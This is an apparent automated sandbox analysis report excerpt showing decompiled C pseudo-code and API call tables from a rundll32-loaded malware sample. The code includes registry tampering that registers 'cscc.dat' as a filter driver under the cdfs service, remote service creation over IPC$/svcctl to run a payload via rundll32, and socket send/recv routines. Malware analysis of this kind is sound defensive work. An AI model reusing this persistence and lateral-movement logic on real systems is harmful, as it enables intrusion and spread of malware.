                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _a20);
                                                                                                                                                              					goto L21;
                                                                                                                                                              				}
                                                                                                                                                              			}
























                                                                                                                                                              0x04e23d0d
                                                                                                                                                              0x04e23d10
                                                                                                                                                              0x04e23d11
                                                                                                                                                              0x04e23d15
                                                                                                                                                              0x04e23d27
                                                                                                                                                              0x04e23d34
                                                                                                                                                              0x04e23d36
                                                                                                                                                              0x04e23d3b
                                                                                                                                                              0x04e240da
                                                                                                                                                              0x04e240e0
                                                                                                                                                              0x04e240e0
                                                                                                                                                              0x04e23d4b
                                                                                                                                                              0x04e23d4f
                                                                                                                                                              0x04e240cb
                                                                                                                                                              0x04e240d3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e240d9
                                                                                                                                                              0x04e23d59
                                                                                                                                                              0x04e23d5c
                                                                                                                                                              0x04e23d68
                                                                                                                                                              0x04e23d6c
                                                                                                                                                              0x04e240bf
                                                                                                                                                              0x04e240c5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e240c5
                                                                                                                                                              0x04e23d75
                                                                                                                                                              0x04e23d7d
                                                                                                                                                              0x04e23dca
                                                                                                                                                              0x04e23dd5
                                                                                                                                                              0x04e23dd9
                                                                                                                                                              0x04e23ddc
                                                                                                                                                              0x04e23ddf
                                                                                                                                                              0x04e23ded
                                                                                                                                                              0x04e23df3
                                                                                                                                                              0x04e23df9
                                                                                                                                                              0x04e23dfc
                                                                                                                                                              0x04e23e00
                                                                                                                                                              0x04e23e03
                                                                                                                                                              0x04e23e06
                                                                                                                                                              0x04e23e0a
                                                                                                                                                              0x04e23e0e
                                                                                                                                                              0x04e23e12
                                                                                                                                                              0x04e23e16
                                                                                                                                                              0x04e23e1a
                                                                                                                                                              0x04e23e1e
                                                                                                                                                              0x04e23d7f
                                                                                                                                                              0x04e23d7f
                                                                                                                                                              0x04e23d8a
                                                                                                                                                              0x04e23d8e
                                                                                                                                                              0x04e23d91
                                                                                                                                                              0x04e23d94
                                                                                                                                                              0x04e23d9f
                                                                                                                                                              0x04e23da5
                                                                                                                                                              0x04e23da8
                                                                                                                                                              0x04e23dac
                                                                                                                                                              0x04e23db0
                                                                                                                                                              0x04e23db4
                                                                                                                                                              0x04e23db8
                                                                                                                                                              0x04e23dbc
                                                                                                                                                              0x04e23dc0
                                                                                                                                                              0x04e23dc4
                                                                                                                                                              0x04e23dc4
                                                                                                                                                              0x04e23e25
                                                                                                                                                              0x04e23e2c
                                                                                                                                                              0x04e23e35
                                                                                                                                                              0x04e23e50
                                                                                                                                                              0x04e240b3
                                                                                                                                                              0x04e240b9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e23e56
                                                                                                                                                              0x04e23e5b
                                                                                                                                                              0x04e23e68
                                                                                                                                                              0x04e23e6e
                                                                                                                                                              0x04e23e73
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e23e7e
                                                                                                                                                              0x04e23e81
                                                                                                                                                              0x04e23e86
                                                                                                                                                              0x04e23e89
                                                                                                                                                              0x04e23e90
                                                                                                                                                              0x04e23e97
                                                                                                                                                              0x04e23e98
                                                                                                                                                              0x04e23ea1
                                                                                                                                                              0x04e23ea4
                                                                                                                                                              0x04e23ea9
                                                                                                                                                              0x04e23eaa
                                                                                                                                                              0x04e23eb2
                                                                                                                                                              0x04e23eb3
                                                                                                                                                              0x04e23eb5
                                                                                                                                                              0x04e23eba
                                                                                                                                                              0x04e23ec3
                                                                                                                                                              0x04e23ecb
                                                                                                                                                              0x04e23ecc
                                                                                                                                                              0x04e23ed2
                                                                                                                                                              0x04e23eda
                                                                                                                                                              0x04e23ee2
                                                                                                                                                              0x04e23eeb
                                                                                                                                                              0x04e23ef2
                                                                                                                                                              0x04e23efc
                                                                                                                                                              0x04e23f0f
                                                                                                                                                              0x04e23f1d
                                                                                                                                                              0x04e23f24
                                                                                                                                                              0x04e23f2a
                                                                                                                                                              0x04e23f38
                                                                                                                                                              0x04e23f40
                                                                                                                                                              0x04e23f54
                                                                                                                                                              0x04e23f57
                                                                                                                                                              0x04e23f5c
                                                                                                                                                              0x04e23f6d
                                                                                                                                                              0x04e23f76
                                                                                                                                                              0x04e23f7f
                                                                                                                                                              0x04e23f88
                                                                                                                                                              0x04e23f8a
                                                                                                                                                              0x04e23f8d
                                                                                                                                                              0x04e23f96
                                                                                                                                                              0x04e23fa1
                                                                                                                                                              0x04e23f98
                                                                                                                                                              0x04e23f98
                                                                                                                                                              0x04e23f98
                                                                                                                                                              0x04e23fab
                                                                                                                                                              0x04e23fae
                                                                                                                                                              0x04e23fb9
                                                                                                                                                              0x04e23fc2
                                                                                                                                                              0x04e23fc9
                                                                                                                                                              0x04e23fcf
                                                                                                                                                              0x04e23fed
                                                                                                                                                              0x04e23ff8
                                                                                                                                                              0x04e24000
                                                                                                                                                              0x04e24004
                                                                                                                                                              0x04e24006
                                                                                                                                                              0x04e24008
                                                                                                                                                              0x04e2400b
                                                                                                                                                              0x04e24011
                                                                                                                                                              0x04e24015
                                                                                                                                                              0x04e24018
                                                                                                                                                              0x04e2401b
                                                                                                                                                              0x04e2401e
                                                                                                                                                              0x04e24021
                                                                                                                                                              0x04e2402c
                                                                                                                                                              0x04e24035
                                                                                                                                                              0x04e2403d
                                                                                                                                                              0x04e2405c
                                                                                                                                                              0x04e24063
                                                                                                                                                              0x04e24075
                                                                                                                                                              0x04e2407e
                                                                                                                                                              0x04e24082
                                                                                                                                                              0x04e2408f
                                                                                                                                                              0x04e24097
                                                                                                                                                              0x04e24097
                                                                                                                                                              0x04e24082
                                                                                                                                                              0x04e2405c
                                                                                                                                                              0x04e23fed
                                                                                                                                                              0x04e23f6d
                                                                                                                                                              0x04e23f40
                                                                                                                                                              0x04e23f24
                                                                                                                                                              0x04e240a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e240ad

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74654F20,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?), ref: 04E23D2B
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E23D34
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04E23D46
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E23D49
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04E23D63
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E23D66
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04E24269,?,00000000,?,?,?), ref: 04E23E5B
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04E23E65
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E23E68
                                                                                                                                                              • rand.MSVCRT ref: 04E23EC3
                                                                                                                                                              • memset.MSVCRT ref: 04E23EFC
                                                                                                                                                                • Part of subcall function 04E23209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04E23BAA,?,?,?,00000000,00000000,?,?,?,04E24A6E), ref: 04E23220
                                                                                                                                                                • Part of subcall function 04E23209: HeapAlloc.KERNEL32(00000000,?,04E23BAA,?,?,?,00000000,00000000,?,?,?,04E24A6E,?,?,?,?), ref: 04E23227
                                                                                                                                                                • Part of subcall function 04E23209: htons.WS2_32(?), ref: 04E23246
                                                                                                                                                                • Part of subcall function 04E23209: memcpy.MSVCRT ref: 04E23276
                                                                                                                                                                • Part of subcall function 04E23209: send.WS2_32(?,00000000,?,00000000), ref: 04E23287
                                                                                                                                                                • Part of subcall function 04E23209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E2329A
                                                                                                                                                                • Part of subcall function 04E23209: HeapFree.KERNEL32(00000000), ref: 04E232A1
                                                                                                                                                              • recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04E23F38
                                                                                                                                                              • htons.WS2_32(?), ref: 04E23F5C
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04E23FF8
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04E24063
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E2406E
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E24075
                                                                                                                                                              • memcpy.MSVCRT ref: 04E2408F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,04E24269,?,00000000,?,?), ref: 04E240A0
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E240A7
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04E24269,?,00000000,?,?), ref: 04E240B6
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E240B9
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04E240C2
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E240C5
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04E240D0
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E240D3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Alloc$Free$Sleep$htonsmemcpy$memsetrandrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 2208892845-3175316637
                                                                                                                                                              • Opcode ID: 7a95ca0b0ae5fd3bda942b3f99c4587f813346c1b284e1fa39a8425432cdeef5
                                                                                                                                                              • Instruction ID: 8b30a1a12e8c8827d104cd1c4eef68c3993443b0f2545f121fb64891cde56716
                                                                                                                                                              • Opcode Fuzzy Hash: 7a95ca0b0ae5fd3bda942b3f99c4587f813346c1b284e1fa39a8425432cdeef5
                                                                                                                                                              • Instruction Fuzzy Hash: 15D17AB1100300AFD720DF69C984F6ABBE5FF48308F148599F989DB292E779E845CB65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E213E8() {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				char _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				int _v24;
                                                                                                                                                              				short _v544;
                                                                                                                                                              				long _t45;
                                                                                                                                                              				signed int _t47;
                                                                                                                                                              				short* _t49;
                                                                                                                                                              				int _t54;
                                                                                                                                                              
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				wsprintfW( &_v544, L"SYSTEM\\CurrentControlSet\\services\\%ws", L"cdfs");
                                                                                                                                                              				if(RegOpenKeyExW(0x80000002,  &_v544, 0, 0xf003f,  &_v8) == 0) {
                                                                                                                                                              					_t54 = 4;
                                                                                                                                                              					_t49 = L"Start";
                                                                                                                                                              					_v12 = 0;
                                                                                                                                                              					_v24 = _t54;
                                                                                                                                                              					if(RegQueryValueExW(_v8, _t49, 0, 0,  &_v12,  &_v24) == 0 && _v12 == _t54) {
                                                                                                                                                              						_v12 = 0;
                                                                                                                                                              						if(RegSetValueExW(_v8, _t49, 0, _t54,  &_v12, _t54) == 0 && RegSetValueExW(_v8, _t49, 0, 4,  &_v12, 4) == 0 && RegSetValueExW(_v8, L"Group", 0, 1, L"Filter", 0xe) == 0 && RegSetValueExW(_v8, L"DependOnService", 0, 7, L"FltMgr", 0xe) == 0) {
                                                                                                                                                              							_v20 = 3;
                                                                                                                                                              							if(RegSetValueExW(_v8, L"ErrorControl", 0, 4,  &_v20, 4) == 0) {
                                                                                                                                                              								_t45 = RegSetValueExW(_v8, L"ImagePath", 0, 2, L"cscc.dat", 0x12);
                                                                                                                                                              								if(_t45 == 0) {
                                                                                                                                                              									do {
                                                                                                                                                              										_t22 = L"cdfs" + _t45; // 0x640063
                                                                                                                                                              										_t47 =  *_t22 & 0x0000ffff;
                                                                                                                                                              										 *(L"cscc" + _t45) = _t47;
                                                                                                                                                              										_t45 = _t45 + 2;
                                                                                                                                                              									} while (_t47 != 0);
                                                                                                                                                              									_v16 = 1;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					RegCloseKey(_v8);
                                                                                                                                                              				}
                                                                                                                                                              				return _v16;
                                                                                                                                                              			}













                                                                                                                                                              0x04e21405
                                                                                                                                                              0x04e21408
                                                                                                                                                              0x04e2142f
                                                                                                                                                              0x04e21439
                                                                                                                                                              0x04e21444
                                                                                                                                                              0x04e2144d
                                                                                                                                                              0x04e21450
                                                                                                                                                              0x04e2145b
                                                                                                                                                              0x04e2147b
                                                                                                                                                              0x04e21482
                                                                                                                                                              0x04e214e2
                                                                                                                                                              0x04e214ed
                                                                                                                                                              0x04e21501
                                                                                                                                                              0x04e21505
                                                                                                                                                              0x04e21507
                                                                                                                                                              0x04e21507
                                                                                                                                                              0x04e21507
                                                                                                                                                              0x04e2150e
                                                                                                                                                              0x04e21515
                                                                                                                                                              0x04e21518
                                                                                                                                                              0x04e2151d
                                                                                                                                                              0x04e2151d
                                                                                                                                                              0x04e21505
                                                                                                                                                              0x04e214ed
                                                                                                                                                              0x04e21482
                                                                                                                                                              0x04e21523
                                                                                                                                                              0x04e2152a
                                                                                                                                                              0x04e21530

                                                                                                                                                              APIs
                                                                                                                                                              • wsprintfW.USER32 ref: 04E21408
                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 04E21427
                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 04E21453
                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04E2147E
                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04E21495
                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 04E214B3
                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 04E214CB
                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 04E214E9
                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 04E21501
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 04E21523
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Value$CloseOpenQuerywsprintf
                                                                                                                                                              • String ID: DependOnService$ErrorControl$Filter$FltMgr$Group$ImagePath$SYSTEM\CurrentControlSet\services\%ws$Start$cdfs$cscc.dat
                                                                                                                                                              • API String ID: 693892761-2357462930
                                                                                                                                                              • Opcode ID: 0d337aeda3c0ad6ae337ff7b4e9ec93d3680f1fa57c81d90118c4a3eb97bdbbe
                                                                                                                                                              • Instruction ID: 37ae0bb867d16c1e3912d3108ac83bf45f225ec33a44a560d612544821820592
                                                                                                                                                              • Opcode Fuzzy Hash: 0d337aeda3c0ad6ae337ff7b4e9ec93d3680f1fa57c81d90118c4a3eb97bdbbe
                                                                                                                                                              • Instruction Fuzzy Hash: CE315271E8121DFBEB219E919E49FAFBB7CEF44B49F101095BA01B1055E2B0AF01DB61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E04E2516B(void* __ecx, intOrPtr _a4, char _a8, signed int _a12, signed char _a15, signed int _a16, intOrPtr _a20) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				char* _v20;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				void* _t79;
                                                                                                                                                              				signed int _t80;
                                                                                                                                                              				signed int _t82;
                                                                                                                                                              				signed int _t84;
                                                                                                                                                              				intOrPtr* _t91;
                                                                                                                                                              				intOrPtr* _t104;
                                                                                                                                                              				void* _t109;
                                                                                                                                                              				signed int _t112;
                                                                                                                                                              				signed int _t113;
                                                                                                                                                              				intOrPtr _t115;
                                                                                                                                                              				signed int _t116;
                                                                                                                                                              				intOrPtr _t118;
                                                                                                                                                              				intOrPtr* _t122;
                                                                                                                                                              
                                                                                                                                                              				_t126 = _a4;
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				if(E04E21EB9(_a4,  &_a8, _a12, "IPC$") != 0) {
                                                                                                                                                              					_v12 = _v12 & 0x00000000;
                                                                                                                                                              					if(E04E22054(_t126, _a8,  &_v12, "svcctl", 1) != 0 && E04E24E60(_t126, _a8, _v12) != 0) {
                                                                                                                                                              						_t72 = HeapAlloc(GetProcessHeap(), 8, 0x14);
                                                                                                                                                              						_v16 = _t72;
                                                                                                                                                              						if(_t72 != 0) {
                                                                                                                                                              							if(E04E24F43(_v12, _t126, _a8,  &_v16) != 0) {
                                                                                                                                                              								_t79 = HeapAlloc(GetProcessHeap(), 8, 0x20);
                                                                                                                                                              								_v20 = _t79;
                                                                                                                                                              								if(_t79 != 0) {
                                                                                                                                                              									_t80 = rand();
                                                                                                                                                              									asm("cdq");
                                                                                                                                                              									_push(_t80 % 0xf4240);
                                                                                                                                                              									_t82 = rand();
                                                                                                                                                              									asm("cdq");
                                                                                                                                                              									_t112 = 0xa;
                                                                                                                                                              									_push(_t82 % _t112);
                                                                                                                                                              									_t84 = rand();
                                                                                                                                                              									_t113 = 0xa;
                                                                                                                                                              									asm("cdq");
                                                                                                                                                              									_push(_t84 % _t113);
                                                                                                                                                              									sprintf(_v20, "clr_optimization_v%d.%d.%d");
                                                                                                                                                              									_t109 = HeapAlloc(GetProcessHeap(), 8, 0x208);
                                                                                                                                                              									if(_t109 != 0) {
                                                                                                                                                              										_t122 = _a16;
                                                                                                                                                              										_t91 = _t122;
                                                                                                                                                              										_a15 = 0;
                                                                                                                                                              										_a16 = _t91 + 1;
                                                                                                                                                              										do {
                                                                                                                                                              											_t115 =  *_t91;
                                                                                                                                                              											_t91 = _t91 + 1;
                                                                                                                                                              										} while (_t115 != 0);
                                                                                                                                                              										if(_t91 != _a16) {
                                                                                                                                                              											_t116 = 0;
                                                                                                                                                              											do {
                                                                                                                                                              												_a15 = _a15 + 1;
                                                                                                                                                              												 *((char*)(_t109 + _t116)) =  *((intOrPtr*)(_t116 + _t122));
                                                                                                                                                              												_t104 = _t122;
                                                                                                                                                              												_a16 = _t104 + 1;
                                                                                                                                                              												do {
                                                                                                                                                              													_t118 =  *_t104;
                                                                                                                                                              													_t104 = _t104 + 1;
                                                                                                                                                              												} while (_t118 != 0);
                                                                                                                                                              												_t116 = _a15 & 0x000000ff;
                                                                                                                                                              											} while (_t116 < _t104 - _a16);
                                                                                                                                                              										}
                                                                                                                                                              										sprintf(_t109, "rundll32 %s,#2 %s", _a20, _t122);
                                                                                                                                                              										_a16 = _a16 & 0x00000000;
                                                                                                                                                              										_a12 = _a12 & 0x00000000;
                                                                                                                                                              										if(E04E24B5D(_v20, _v16, _t109,  &_a16,  &_a12) != 0 && E04E2501E(_t115, _a4, _a8, _v12, _a16, _a12,  &_v16) != 0 && E04E250A2(_t115, _a4, _a8, _v12, _v16) != 0) {
                                                                                                                                                              											_v5 = 1;
                                                                                                                                                              										}
                                                                                                                                                              										HeapFree(GetProcessHeap(), 8, _t109);
                                                                                                                                                              									}
                                                                                                                                                              									HeapFree(GetProcessHeap(), 8, _v20);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v5;
                                                                                                                                                              			}





















                                                                                                                                                              0x04e25172
                                                                                                                                                              0x04e25182
                                                                                                                                                              0x04e2518d
                                                                                                                                                              0x04e25193
                                                                                                                                                              0x04e251ad
                                                                                                                                                              0x04e251dc
                                                                                                                                                              0x04e251de
                                                                                                                                                              0x04e251e3
                                                                                                                                                              0x04e251fb
                                                                                                                                                              0x04e25208
                                                                                                                                                              0x04e2520a
                                                                                                                                                              0x04e2520f
                                                                                                                                                              0x04e2521b
                                                                                                                                                              0x04e2521d
                                                                                                                                                              0x04e25225
                                                                                                                                                              0x04e25226
                                                                                                                                                              0x04e2522a
                                                                                                                                                              0x04e2522b
                                                                                                                                                              0x04e2522e
                                                                                                                                                              0x04e2522f
                                                                                                                                                              0x04e25233
                                                                                                                                                              0x04e25234
                                                                                                                                                              0x04e2523d
                                                                                                                                                              0x04e25246
                                                                                                                                                              0x04e25257
                                                                                                                                                              0x04e2525b
                                                                                                                                                              0x04e25261
                                                                                                                                                              0x04e25264
                                                                                                                                                              0x04e25269
                                                                                                                                                              0x04e2526d
                                                                                                                                                              0x04e25270
                                                                                                                                                              0x04e25270
                                                                                                                                                              0x04e25272
                                                                                                                                                              0x04e25273
                                                                                                                                                              0x04e2527a
                                                                                                                                                              0x04e2527c
                                                                                                                                                              0x04e2527e
                                                                                                                                                              0x04e25281
                                                                                                                                                              0x04e25284
                                                                                                                                                              0x04e25287
                                                                                                                                                              0x04e2528c
                                                                                                                                                              0x04e2528f
                                                                                                                                                              0x04e2528f
                                                                                                                                                              0x04e25291
                                                                                                                                                              0x04e25292
                                                                                                                                                              0x04e25296
                                                                                                                                                              0x04e2529d
                                                                                                                                                              0x04e2527e
                                                                                                                                                              0x04e252ab
                                                                                                                                                              0x04e252ad
                                                                                                                                                              0x04e252b1
                                                                                                                                                              0x04e252ce
                                                                                                                                                              0x04e25301
                                                                                                                                                              0x04e25301
                                                                                                                                                              0x04e2530b
                                                                                                                                                              0x04e2530b
                                                                                                                                                              0x04e25319
                                                                                                                                                              0x04e25319
                                                                                                                                                              0x04e2520f
                                                                                                                                                              0x04e25327
                                                                                                                                                              0x04e25327
                                                                                                                                                              0x04e2532e
                                                                                                                                                              0x04e251ad
                                                                                                                                                              0x04e25334

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E21EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,04E2943A), ref: 04E21ED2
                                                                                                                                                                • Part of subcall function 04E21EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E21EDB
                                                                                                                                                                • Part of subcall function 04E21EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04E2943A), ref: 04E21F1F
                                                                                                                                                                • Part of subcall function 04E21EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E21F22
                                                                                                                                                                • Part of subcall function 04E21EB9: htons.WS2_32(?), ref: 04E21F41
                                                                                                                                                                • Part of subcall function 04E22054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,04E2943A), ref: 04E2206D
                                                                                                                                                                • Part of subcall function 04E22054: HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E22076
                                                                                                                                                                • Part of subcall function 04E22054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,04E2943A), ref: 04E2209C
                                                                                                                                                                • Part of subcall function 04E22054: HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E2209F
                                                                                                                                                                • Part of subcall function 04E22054: htons.WS2_32(?), ref: 04E220BC
                                                                                                                                                                • Part of subcall function 04E22054: send.WS2_32(?,00000000,?,00000000), ref: 04E22131
                                                                                                                                                                • Part of subcall function 04E22054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04E22148
                                                                                                                                                                • Part of subcall function 04E22054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04E2943A), ref: 04E22168
                                                                                                                                                                • Part of subcall function 04E22054: HeapFree.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E2216F
                                                                                                                                                                • Part of subcall function 04E24E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04E24E76
                                                                                                                                                                • Part of subcall function 04E24E60: HeapAlloc.KERNEL32(00000000), ref: 04E24E79
                                                                                                                                                                • Part of subcall function 04E24E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E24F2A
                                                                                                                                                                • Part of subcall function 04E24E60: HeapFree.KERNEL32(00000000), ref: 04E24F2D
                                                                                                                                                                • Part of subcall function 04E24E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04E24F32
                                                                                                                                                                • Part of subcall function 04E24E60: HeapFree.KERNEL32(00000000), ref: 04E24F35
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 04E251D3
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E251DC
                                                                                                                                                                • Part of subcall function 04E24F43: GetProcessHeap.KERNEL32(00000008,00000068,74654F20,?,77D74620,?,04E251F9,?,?,?), ref: 04E24F56
                                                                                                                                                                • Part of subcall function 04E24F43: HeapAlloc.KERNEL32(00000000,?,04E251F9,?,?,?), ref: 04E24F5D
                                                                                                                                                                • Part of subcall function 04E24F43: rand.MSVCRT ref: 04E24F86
                                                                                                                                                                • Part of subcall function 04E24F43: GetProcessHeap.KERNEL32(00000008,?,04E251F9,?,00000000,?,04E251F9,04E251F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04E24FF7
                                                                                                                                                                • Part of subcall function 04E24F43: HeapFree.KERNEL32(00000000), ref: 04E24FFE
                                                                                                                                                                • Part of subcall function 04E24F43: GetProcessHeap.KERNEL32(00000008,00000000,04E251F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,04E251F9,?,?,?), ref: 04E25007
                                                                                                                                                                • Part of subcall function 04E24F43: HeapFree.KERNEL32(00000000,?,04E251F9,?,?,?), ref: 04E2500E
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04E25205
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E25208
                                                                                                                                                              • rand.MSVCRT ref: 04E2521B
                                                                                                                                                              • rand.MSVCRT ref: 04E25226
                                                                                                                                                              • rand.MSVCRT ref: 04E2522F
                                                                                                                                                              • sprintf.MSVCRT ref: 04E25246
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,04E2943A), ref: 04E25252
